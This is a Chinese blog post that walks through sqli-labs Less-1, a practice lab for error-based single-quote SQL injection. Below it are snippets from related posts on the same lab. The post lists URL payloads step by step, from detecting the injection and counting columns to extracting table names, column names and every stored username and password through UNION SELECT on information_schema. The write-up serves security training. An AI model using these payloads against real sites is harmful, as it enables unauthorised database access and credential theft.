sqli_labs:Less-1 简要SQL注入-基于错误的单引号字符串

已于 2023-04-11 21:11:13 修改
阅读量601 收藏 3
点赞数 1
分类专栏: 靶场 文章标签: sql 数据库 mysql
于 2021-08-13 17:18:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43660551/article/details/119675106
版权

一、判断是否存在注入,注入是字符型还是数字型。

?id=1,正常

 ?id=1' ,加上“ ' ”后,报错,所以可能存在字符型输入。

?id=1%27--+ ,用--+注释掉以后,正常。

 所以存在单引号字符型注入。

二、猜解SQL查询语句中的字段数。

?id=1' order by 1--+ ,查询成功。

 ?id=1' order by 2--+ ,查询成功。

?id=1' order by 3--+ ,查询成功。

?id=1' order by 4--+ ,查询失败。

说明字段数为3。

三、确定回显位(找注入点)。

?id=-1' union select 1,2,3--+ ,让id值为-1,数据库里面没有id值为-1,所以返回union select的结果。这里2和3就是回显位,所以在2和3处可以输入MYSQL语句。

四、获取当前数据库。

在2、3处查询当前数据库名、版本。

 五、获取数据库中的表。

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

(database()换成'security' 也可以,因为当前数据库为security,一定要给数据库名加单引号。)

(MYSQL5.0以上版本中,存在一个information_schema,存储了所有数据库名、表名、列名;information_schema.tables为记录所有表名信息的表;table_schema表示数据库名)

 六、获取表中的字段名。

查询指定表名users中的列名信息。

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

列名包括: USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

七、爆用户名和密码,下载数据。

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

成功获得所有用户名和密码。

 

发奋的鼹鼠
关注
专栏目录
网络安全之sql注入-less1
koala_king的博客
08-17 1399
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
Less-1(sql注入)
qq_44598397的博客
03-13 391
Less-1 源码: 1、输入: http://127.0.0.1/sqlilabs/Less-1/?id=1’ 经过URL编码过后格式变为(http://127.0.0.1/sqlilabs/Less-1/?id=1') (页面出现错误的原因是因为多了一个’号而源代码变成多了一个分号提前截止) 2、后面输入or 1=1 --+后面把’后的注释掉(–+表注释 (–空格)在SQL内表示注释,但在...
关于sql注入--+
热门推荐
内心不种满鲜花就会长满杂草
03-14 1万+
--+ sql注入过程我们经常会碰到 --+这个东西,刚学习的小伙伴可能会对此有疑问,现在就来看看这个--+是一个什么东西。 其实 --在sql语句起着注释的作用,将后面的语句注释掉,+ 则代表空格。为了更形象的显示,我们以sqli-labs 第一关来说明--+ 1. 在源码添加语句,将我们执行的语句打印出来 echo "执行的sql语句:"."$sql"."<br>"; 看浏览器,我们输入的--+变成了--空格,此时--后面的语句被注释掉了,不会再...
SQL注入less-1
m0_62903168的博客
05-03 996
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 2054
SQL注入闯关
SQL注入——sqli-labs(Less-1)
E-Malon的博客
05-29 275
一边查看源码,一边多方学习别人的 WriteUp,在此过程补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1409
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型
最新发布
08-12
sqli-labs-master是一个SQL注入SQL Injection,简称Sqli)实战靶场的资源。这个靶场通常用于安全培训、渗透测试和学习Web应用程序安全方面的人员,它提供了一系列的模拟环境和挑战,目的是让用户通过实际操作来...
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 712
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件打包 用-r 选择目标txt文件爆出当前主机名称。
PHP、Apache环境部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
从零记录sqli-labs学习过程 sqli-labs Less-3
fpxnb1的博客
03-24 2127
sqli-labs Less-3
sql注入系列Sqli-labs(less-1)
BetsyMyGirl的博客
11-30 2235
判断注入点 http://192.168.81.210/sqli/Less-1/?id=1’输入单引号出现报错,从报错语句可以猜测后端代码为 select user from users where id='1' limit 0,1 当输入了一个单引号语句就变成了 select user from users where id='1'' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1935
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境来看看它的数据库到底有什么东西...
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 434
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-labs之Less-1
柠鹿的轨迹
04-02 183
声明:文所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本文首发于 涂寐’s Blogs:https://0xtlu.github.io/article/16ddc750.html
sqli-labs/Less-1
m0_71299382的博客
11-09 129
sqli-labs第一关
SQLI-labs-第一关
weixin_54055099的博客
08-26 722
sqli-labs第一关的思路和原理
sql注入
qq_30365511的博客
07-06 656
直接放图 有回显的地方可以插入sql语句,pyload看url order by 找出3个字段 union select 1,2,3 2,3就是显示位,可以放sql语句,–+为了注释后面语句 例如这个 报错注入三种都试一下paylod里面放sql语句 第七题传个马,然后。。。。。然后我没菜刀 第八题盲注 就是瞎猜(开个玩笑)通过页面是否正确返回来判断 例如 第九题,显示一样,加一个sleep函数区分是否执行和第八题一样 第十题,双引号盲注,剩下的和第九题一样 ...
关于SQL注入的#,--,--+的使用
qq_30889301的博客
05-24 1044
了解原理后便知道了–无法使用的原因,是因为–与后面的单引号连接在一起,无法形成有效的mysql语句。原因是url#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以在注入时我们除了使用–+外,也可以使用–'来完成sql注入语句。在mysql使用这个语句分析原因,输入后回车显示分号没有闭合。用来和后面的单引号分隔开,将后面的语句注释。有时发现URL执行sql注入时#号无效。将#号改成url的编码%23就可以了。这里发现+号在语句变成了空格。所以,HTTP请求不包括#
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值